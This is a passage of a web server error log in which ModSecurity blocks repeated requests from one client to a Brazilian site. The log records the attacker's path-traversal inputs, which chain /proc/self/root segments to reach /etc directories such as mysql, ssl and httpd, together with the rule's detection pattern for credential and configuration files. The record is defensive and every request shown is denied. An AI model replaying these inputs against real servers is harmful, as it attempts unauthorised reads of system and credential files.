"bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe6f9ocpUE4ed4uDwGugAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:50:03.292045 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.241.46:51198] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe67ysWC90G-1nBrBX7wAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:50:04.621044 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.241.46:51206] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe7KQpVkWug9HeOt9JiwAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:50:05.960506 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.241.46:51218] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe7bABkC4fWIHEf8EHkQAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:50:08.435523 2026] [:error] [pid 14895:tid 140411565680384] [client 74.7.241.46:51226] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe8FajLEzk2WiQ-10nLgAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:50:09.873046 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:42686] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe8bABkC4fWIHEf8EHlQAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:50:11.157343 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.241.46:42692] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe87ABkC4fWIHEf8EHlgAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:50:12.487906 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.241.46:42696] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe9KQpVkWug9HeOt9JkgAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:50:14.809291 2026] [:error] [pid 15568:tid 140411540502272] [client 74.7.241.46:42708] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe9qQpVkWug9HeOt9JmQAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:50:17.269775 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:42720] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe-P9ocpUE4ed4uDwGwAAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:50:18.648660 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.241.46:60640] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhe-o6lpbStxTqkSkt-kAAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:50:24.427312 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.241.46:60656] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfAP9ocpUE4ed4uDwG1gAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:50:25.771482 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.241.46:60666] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfAbABkC4fWIHEf8EHpAAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:50:27.027585 2026] [:error] [pid 15061:tid 140411607643904] [client 74.7.241.46:60670] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfA6TCbgAP5jq5TehAywAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:50:28.350197 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.241.46:46134] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfBI6lpbStxTqkSkt-mQAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:50:30.837175 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.241.46:46140] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfBrysWC90G-1nBrBX_QAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:50:34.124428 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.241.46:46154] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfCtSswJuvopo3lOhzLAAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:50:35.531463 2026] [:error] [pid 29507:tid 140411658000128] [client 74.7.241.46:46168] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfC0r9dMAiw-8KANNbKQAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:50:37.890112 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:46178] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfDbysWC90G-1nBrBYAQAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:50:43.507656 2026] [:error] [pid 29507:tid 140411683178240] [client 74.7.241.46:40930] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfE0r9dMAiw-8KANNbMwAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:50:44.857146 2026] [:error] [pid 29507:tid 140411599251200] [client 74.7.241.46:40940] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfFEr9dMAiw-8KANNbNAAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:50:46.105415 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.241.46:40946] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfFrABkC4fWIHEf8EHrAAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
